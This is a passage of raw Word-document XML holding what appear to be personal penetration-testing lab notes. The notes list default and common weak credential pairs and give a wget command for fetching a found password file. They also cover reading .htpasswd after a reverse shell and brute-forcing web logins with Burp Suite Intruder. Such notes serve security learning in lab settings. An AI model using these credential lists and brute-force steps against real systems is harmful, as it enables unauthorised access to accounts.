          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt, sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000332">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000333">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin : admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin : password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000335">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin :  123456</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000336">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin :  root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000337">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">administrator:administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000338">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">administrator: [no password]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000339">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root : root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root : admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root : toor (root spelled backwards)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root : [no password]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bitnami:bitnami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">guest : guest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at more default </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000340">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common weak credential pairs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000342">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000343">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000344">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:toor (root spelled backwards)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000345">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000346">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000347">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:password1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000348">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:password1</w:t>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t xml:space="preserve">Most common password list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Most common 2024</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then if you are in a page called /admin, then try username "admin"</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How to download files from website:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000350">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1396"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you find something like a password list from a website, like https://10.10.10.10/passwd.txt, then you can download it quickly to local Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000351">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1396"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget https://10.10.10.10/passwd.txt</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t xml:space="preserve">Navigating a web server after getting inside (ex. Through reverse shell):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000355">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000357">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for interesting files like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.htaccess</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.htpasswd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(the "." at the start means hidden files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000358">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">htpasswd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file is used to store usernames and passwords for basic authentication of HTTP users. Let's read both file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This actually gave us the password for a user in </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, which eventually gave us root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.htaccess</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is typically used to secure directories with Apache</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zib9mi4bz239" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce website login using Burpsuite</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t xml:space="preserve">One example of bruteforcing website login using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burpsuite </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can be seen in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Walla</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0360">
      <w:pPr>
        <w:rPr/>
      </w:pPr>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Another example in </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Monster</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="260" name="image269.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image269.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="318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4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from my test on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-B .249</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000365">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, send a POST request to intruder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000366">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then select the parameter you want to bruteforce which is the password here and press the "Add" button on the top </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000367">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then "Load" your wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000368">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then Start attack</w:t>
      </w:r>
    </w:p>
